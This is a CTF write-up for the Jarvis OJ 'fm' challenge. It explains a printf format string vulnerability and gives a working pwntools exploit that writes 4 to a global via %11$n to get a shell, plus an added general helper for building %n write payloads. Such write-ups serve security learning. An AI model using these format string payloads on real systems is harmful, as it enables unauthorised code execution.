[61dctf]fm
2022-07-05 16:46:00 [mzq]
Attachment address : https://dn.jarvisoj.com/challengefiles/fm.eaef2247796c11db798a579396482399
nc pwn2.jarvisoj.com 9895
checksec shows a stack canary, so a plain stack overflow is not an option.
main function
The if statement checks the value of x, but we have no direct control over x. printf is called with buf as its format string, so this is a format string vulnerability. Since the if compares x with 4, we can use %n to write the int value 4 (the number of bytes printed so far) to any address we choose.
int __cdecl main(int argc, const char **argv, const char **envp)
{
    char buf; // [esp+2Ch] [ebp-5Ch]
    unsigned int v5; // [esp+7Ch] [ebp-Ch]

    v5 = __readgsdword(0x14u);          // stack canary
    be_nice_to_people();
    memset(&buf, 0, 0x50u);
    read(0, &buf, 0x50u);               // our input, up to 0x50 bytes
    printf(&buf);                       // user input used as the format string
    printf("%d!\n", x);
    if ( x == 4 )                       // x is a global we cannot write directly
    {
        puts("running sh...");
        system("/bin/sh");
    }
    return 0;
}
You can see from the output that aaaa sits at offset 11.
Dynamic debugging confirms it: setting x to 0x4 and continuing really gives a shell.
exp
from pwn import *
context(log_level="debug", arch="i386")
# io = process("./stack")   # local test
io = remote("pwn2.jarvisoj.com", 9895)
x_addr = 0x0804A02C          # address of the global x
# the 4 address bytes are printed first, so %11$n stores 4 into x
payload = flat([x_addr, b'%11$n'])
io.sendline(payload)
io.interactive()
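Added example (not part of the original writeup): a small helper that builds the %n payload above and, for values larger than 4, pads the output with a %c directive so the byte count reaches the desired value, plus an emulator of printf's running byte count so the payload can be checked offline before sending it. X_ADDR and the offset 11 are the values from the writeup; the padding approach generalises the single case on the page.

```python
import re
import struct

# Values from the writeup: the address of the global x and the stack offset of buf.
X_ADDR = 0x0804A02C
OFFSET = 11

def build_fmt_write(addr: int, value: int, offset: int) -> bytes:
    """Build a payload that makes `printf(buf)` store `value` (an int) at `addr`.

    The 4-byte address is placed first, so 4 bytes have been printed by the time
    the %n is reached; any remaining count is supplied by a width-padded %c.
    Values below 4 cannot be produced this way (the address alone prints 4 bytes).
    """
    if value < 4:
        raise ValueError("cannot write a value smaller than the 4 address bytes already printed")
    packed = struct.pack("<I", addr)
    if b"\x00" in packed:
        raise ValueError("address contains a NUL byte; printf would stop there")
    payload = packed
    if value > 4:
        payload += b"%%%dc" % (value - 4)   # pad total output up to `value` bytes
    payload += b"%%%d$n" % offset            # write the running byte count via arg `offset`
    return payload

def count_before_n(payload: bytes) -> int:
    """Emulate how many bytes printf emits before the first %n in `payload`.

    Only the directives the payload uses are modelled: %Nc (N bytes, since %c
    prints one character padded to width N) and %k$n (the write itself).
    """
    printed = 0
    i = 0
    while i < len(payload):
        if payload[i:i + 1] != b"%":
            printed += 1      # raw byte (the packed address) is echoed as-is
            i += 1
            continue
        m = re.match(rb"%(\d*)c", payload[i:])
        if m:
            printed += max(int(m.group(1) or 1), 1)
            i += m.end()
            continue
        if re.match(rb"%\d+\$n", payload[i:]):
            return printed
        raise ValueError("unsupported directive at byte %d" % i)
    raise ValueError("no %n directive in payload")
```

For this challenge `build_fmt_write(X_ADDR, 4, OFFSET)` reproduces the exp payload exactly; the emulator reports 4 bytes printed, which is the value that lands in x.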